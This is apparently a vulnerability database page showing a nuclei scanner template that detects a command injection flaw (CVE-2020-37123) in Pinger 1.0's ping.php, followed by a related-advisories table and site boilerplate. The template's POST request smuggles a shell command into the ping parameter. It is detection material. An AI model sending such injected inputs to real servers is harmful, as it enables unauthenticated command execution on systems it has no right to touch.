Lucene search
K

Pinger 1.0 - Remote Code Execution

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Pinger 1.0 remote code execution via ping.php from unsanitized ping and socket inputs.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2020-37123
5 Feb 202616:13
attackerkb
Circl
CVE-2020-37123
7 Feb 202617:49
circl
CNNVD
pinger 操作系统命令注入漏洞
5 Feb 202600:00
cnnvd
CVE
CVE-2020-37123
5 Feb 202616:13
cve
Cvelist
CVE-2020-37123 Pinger 1.0 - Remote Code Execution
5 Feb 202616:13
cvelist
EUVD
EUVD-2020-31045
5 Feb 202616:13
euvd
NVD
CVE-2020-37123
5 Feb 202617:16
nvd
Positive Technologies
PT-2026-6567
5 Feb 202600:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2020-37123
16 Mar 202600:00
vulncheck_kev
Vulnrichment
CVE-2020-37123 Pinger 1.0 - Remote Code Execution
5 Feb 202616:13
vulnrichment
Rows per page
id: CVE-2020-37123

info:
  name: Pinger 1.0 - Remote Code Execution
  author: bswearingen
  severity: critical
  description: |
    Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters.
  impact: |
    An unauthenticated attacker can execute arbitrary system commands on the server.
  remediation: |
    Remove Pinger or apply input validation to sanitize the ping and socket parameters.
  reference:
    - https://www.exploit-db.com/exploits/48323
    - https://nvd.nist.gov/vuln/detail/CVE-2020-37123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-37123
    epss-score: 0.03135
    epss-percentile: 0.86345
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: pinger
    product: pinger
  tags: cve,cve2020,pinger,rce,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "ping.php"
        internal: true

  - raw:
      - |
        POST /ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ping=127.0.0.1;echo+{{md5('CVE-2020-37123')}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5('CVE-2020-37123')}}"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022064c2631bae687af5b4f66e68df311b51eb08ed076c1f5c0af006dba317138b99022100f7436432a3a94e08617e36a22201b9fe3e16d4a877d17becfbd7a5ab35577d4e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 17:49Current
6.7Medium risk
Vulners AI Score6.7
CVSS 49.3
CVSS 3.19.8
EPSS0.03135
SSVC
8